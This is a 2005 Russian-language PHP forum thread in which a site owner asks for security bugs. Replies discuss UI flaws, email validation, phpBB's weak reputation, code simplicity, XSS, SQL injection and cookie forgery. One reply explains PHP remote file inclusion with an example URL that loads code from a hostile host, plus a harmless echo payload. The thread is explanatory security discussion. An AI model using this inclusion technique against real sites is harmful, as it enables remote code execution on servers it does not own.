| |
|
|
| | Найдите как можно больше багов в сайте http://www.fi12.kiev.ua.
Заранее спасибо! | |
| |
|
|
| |
|
|
| |
для: @ndry
(23.10.2005 в 19:41)
| | | Ну например в разделах Профиль и Upload у вас та же форма авторизации что и в меню сбоку. Наверное лучше, чтобы не сбить с толку юзера, надо высветить какое либо сообщение... | |
| |
|
|
| |
|
|
| |
для: codexomega
(23.10.2005 в 20:09)
| | | Спасибо, но хотелось бы чтото из безопасности обнаружить! | |
| |
|
|
| |
|
|
| |
для: @ndry
(23.10.2005 в 22:10)
| | | Самый большой баг - phpBB :) | |
| |
|
|
| |
|
|
| |
для: @ndry
(23.10.2005 в 22:10)
| | | При регестрации, ввожу email xx@.com и он проходит как правильный.
Не знаю, важно ли вам это... | |
| |
|
|
| |
|
|
| |
для: codexomega
(23.10.2005 в 22:27)
| | | А почему пхп бб - баг? Вы можите сказать какие дам есть дыры?
Важно, спасибо | |
| |
|
|
| |
|
|
| |
для: @ndry
(23.10.2005 в 22:35)
| | | Нет я не могу, но уж очень его любят ломать.
Вот то что нашел на скорую руку: http://www.winux.net.ru/index.php?showtopic=105 | |
| |
|
|
| |
|
|
| |
для: Евгений Петров
(23.10.2005 в 22:37)
| | | они не актуальны | |
| |
|
|
| |
|
|
| |
для: @ndry
(23.10.2005 в 23:21)
| | | antichat.ru да и другие есть.
Дело в том, что чем больше форум популярен и чем больше в нем возможностей, тем больше его ломают.
Странно, но почему то не видел, что бы писали о том, что: "С ростом кода и его сложности, возможность "багов" увеличиваеться если не в геометрической, то в математической прогресии."
Если бы я знал, это раньше мне бы это помогло.
отсюда вывод. Кода должен быть как можно меньше и он должен быть как можно проще. | |
| |
|
|
| |
|
|
| |
для: Akira
(24.10.2005 в 01:51)
| | | Нет почему об этом пишут http://www.softtime.ru/info/read.php?id_article=51, кроме того, плотность ошибок не зависит от языка программирования, а зависит только от квалификации программиста, поэтому чем меньше ваш код по объёму, тем меньше там ошибок. Именно поэтому прибегают к регулярным выражениям, SQL и другим мини-языкам - код короче получается. | |
| |
|
|
| |
|
|
| |
для: cheops
(24.10.2005 в 13:08)
| | | А какие существуют приемы (кроме SQL конечно) взлома скриптов? Подкиньте статью плиз.... | |
| |
|
|
| |
|
|
| |
для: Евгений Петров
(24.10.2005 в 15:22)
| | | В статье Безопасное программирование на PHP имеется пару ссылок на статьи по межсайтовому скрптингу (XSS), хотя он не так опасен как SQL-инъекции, но его не следует недооценивать. Всё остальное сводится принебрежением к суперглобальным массивам и использованием конструкций вида
и обращение к странице навроде index.php?temp=../src/index.php
Ошибки в авторизации, доверие пользователю, позволяющие подделывать куки, пользовательские агенты, рефереры и загружать вместо целевого файла всякую белиберду. | |
| |
|
|
| |
|
|
| |
для: cheops
(24.10.2005 в 19:46)
| | | С инклудой понятно (насколько я понял можно просто подставить свой код) А чем опасна index.php?temp=../src/index.php ? | |
| |
|
|
| |
|
|
| |
для: Евгений Петров
(24.10.2005 в 20:12)
| | | Там идёт игра на том, что вместо относительного пути указывается сетевой путь index.php?temp=http://www.mysite.ru/src/index.txt. Файл на враждебном хосте имеет расширение txt и не интерпретируется, т.е. вставляется как есть. После этого в index.php пишется что-то вроде
<?php
echo "Hello world! Ваш сайта взломан";
?>
|
И получается, что PHP-код выполняется. Вместо echo каждый подставляет код в меру своей испорченности, от удалённого монитора, до уничтожения виртуального хоста. | |
| |
|
|
| |
|
|
| |
для: cheops
(24.10.2005 в 20:43)
| | | Ясно. Учту впоследствие. :) | |
| |
|
|
| |
|
|
| |
для: cheops
(24.10.2005 в 13:08)
| | | Когда я начинал писать первые коды, я совершил большую ошибку, т.к. думал, чем больше код тем лучше (мол как так маленький код может хорошо работать) и работало все не очень хорошо :)
Я считаю, что каждому новичку надо напоминать, что "Простота залог успеха.". | |
| |
|
|
|
